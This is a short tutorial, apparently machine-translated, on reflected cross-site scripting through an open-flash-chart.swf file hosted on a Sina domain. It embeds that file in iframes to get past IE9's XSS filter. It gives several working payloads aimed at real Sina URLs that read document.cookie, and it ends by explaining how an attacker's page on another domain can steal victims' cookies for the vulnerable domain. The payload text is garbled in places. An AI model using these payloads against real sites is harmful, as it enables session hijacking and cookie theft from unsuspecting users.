How to Use reflective xss Based on flash

When I tested WEBQQ yesterday, I used this and went back to test it locally.
 
----------------------------------------------------
 
Create a page on the local localhost and perform the following tests.
 
The traditional reflected XSS is called through iframe, because the iframe page is filtered out by the IE9 filter and is not executed.
 
<Code>
<Iframe/src = "http://xsst.sinaapp.com/example/1-1.php? Page = <script> alert (document. cookie) </script> ">
</Code> if a common embed is used to embed FLASH, localhost is displayed, which is the cookies of the current test webpage.
 
Test in IE: chrome will crash. www.2cto.com
 
<Code>
<Embed/src = "http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf? Get-data = (function () {location. href = % 22 javascript: '<script> alert (document. cookie) </script> '% 22}) () "allowscriptaccess =" always "> </embed>
</Code> but using iframe to embed flash xss is interesting.
 
The test code is as follows (IE ):
 
<Iframe/src = "http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf? Get-data = (function () {location. href = % 22 javascript: '<script> alert (document. cookie) </script> '% 22}) () "> </iframe> in chrome, the browser may crash. You can use the following code instead.
 
<Iframe/src = "http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf? Get-data = (function () {alert (document. cookie)}) () "> </iframe> run the command and you will find that the cookies of Sina domain are displayed ~
 
------------------------------------------
 
Therefore, when we find a flash XSS under the www.A.com Domain Name
 
We can use iframe to embed the flash XSS file www.A.com under the www. B .com domain name.
 
When the victim opens the domain name www. B .com, we can successfully obtain its cookies on www.A.com!